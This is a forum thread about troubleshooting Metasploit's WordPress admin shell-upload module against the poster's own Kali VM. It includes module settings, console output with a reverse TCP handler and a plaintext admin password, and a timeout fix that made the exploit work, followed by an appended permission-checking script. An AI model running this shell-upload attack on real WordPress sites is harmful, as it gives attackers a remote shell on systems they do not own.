File upload in Wordpress

So, I am trying to run this exploit through Metasploit, all done on the same Kali Linux VM. I am trying to attack from my VM to the same VM.
Also thinking of making a room in the process.

Kali Linux system (latest)

Apache: Server version: Apache/2.4.46 (Debian), Server built: 2021-01-11T10:58:23

MariaDB: mariadb Ver 15.1 Distrib 10.5.8-MariaDB, for debian-linux-gnu (x86_64) using EditLine wrapper

PHP: PHP 7.4.11 (cli) (built: Oct 6 2020 10:34:39) ( NTS )

Wordpress: version 5.0.11, No plugins

Metasploit: metasploit v6.0.16-dev

exploit: unix/webapp/wp_admin_shell_upload

PASSWORD: REDACTED1

RHOSTS: 192.168.116.128 (ip a: lo: … eth0: inet 192.168.116.128/24

TARGETURI /wordpress/ (Wordpress directory: /var/www/html/wordpress)

USERNAME: REDACTED4

LHOST: 192.168.116.128

-It’s the same, because I am trying to do the exploit from my local metasploit to the same Virtual Machine, all at once.

show targets:
0 Wordpress

set target 0
sh: 0: getcwd() failed: No such file or directory
target => 0

msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
sh: 0: getcwd() failed: No such file or directory

[*] Started reverse TCP handler on 192.168.116.128:4444
[*] Authenticating with WordPress using admin:password1234…
[+] Authenticated with WordPress
[*] Preparing payload…
[*] Uploading payload…
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.

So, obviously I am doing something wrong. Can somebody help me out? Thanks!

From what I know, there are 2 reasons. The first reason being that you simply don’t have permission to modify anything nor add anything. This could be either because your user in WordPress doesn’t have the admin role or the files in your WordPress directory are simply not writable by the account that runs the webserver. Your webserver should in theory be run as www-data. So you should make sure that all the files in your WordPress directory are writable by www-data. You can achieve this by running “chown www-data:www-data /Path/to/wordpress”. If that’s not the problem, then it could be because there is a delay between the requests that Metasploit sends. In this module, by default, there is a “HTTPClientTimeout” flag. I think its default value is 30 seconds or something. So if you know that your WordPress instance is running kinda slowly, you could try increasing that timeout with: “set HttpClientTimeout 300”. This command will put the timeout as 300 seconds. Hope this helps.


Setting HTTPClientTimeout to 120 worked for me. Since it seemed to take almost 2 minutes for me, I probably could have set it to a higher value. Thank you!

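One way to check the first cause named in the answer above (whether the web server account can write to the WordPress directory), written as an added example that is not from the thread. `can_write` and `audit_wp` are hypothetical helper names, the `wp-content` subdirectories are the standard WordPress layout rather than paths quoted in the posts, and GNU `stat` is assumed.

```sh
#!/bin/sh
# Added example (not from the thread). Requires GNU stat, as shipped on Kali/Debian.

# can_write UID "GID GID ..." PATH
# Exit status: 0 if the owner/group/other mode bits let that identity write to
# PATH, 1 if they do not, 2 if PATH cannot be stat'ed. ACLs, MAC policy and
# read-only mounts are ignored. The ( ) body keeps variables local.
can_write() (
    uid=$1 gids=$2 path=$3
    meta=$(stat -c '%u %g %a' -- "$path" 2>/dev/null) || exit 2
    set -- $meta                    # $1 owner uid, $2 group gid, $3 octal mode
    owner=$1 group=$2 mode=$3
    [ "$uid" -eq 0 ] && exit 0      # root is not limited by mode bits
    if [ "$uid" -eq "$owner" ]; then
        [ $(( 0$mode & 0200 )) -ne 0 ]; exit $?
    fi
    for g in $gids; do
        if [ "$g" -eq "$group" ]; then
            [ $(( 0$mode & 0020 )) -ne 0 ]; exit $?
        fi
    done
    [ $(( 0$mode & 0002 )) -ne 0 ]
)

# audit_wp WP_ROOT [ACCOUNT]: one line per standard WordPress content directory.
# ACCOUNT defaults to www-data, the web server user named in the answer.
audit_wp() (
    wp_root=$1 account=${2:-www-data}
    uid=$(id -u "$account") && gids=$(id -G "$account") || exit 2
    for sub in . wp-content wp-content/plugins wp-content/themes wp-content/uploads; do
        rc=0
        can_write "$uid" "$gids" "$wp_root/$sub" || rc=$?
        case $rc in
            0) echo "writable      $wp_root/$sub" ;;
            1) echo "not writable  $wp_root/$sub" ;;
            *) echo "missing       $wp_root/$sub" ;;
        esac
    done
)

# Run as: sh check.sh /var/www/html/wordpress www-data   (check.sh is a placeholder name)
if [ "$#" -gt 0 ]; then audit_wp "$@"; fi
```

A `not writable` line corresponds to the permission cause described in the answer; `missing` means the path does not exist or could not be inspected by the user running the script.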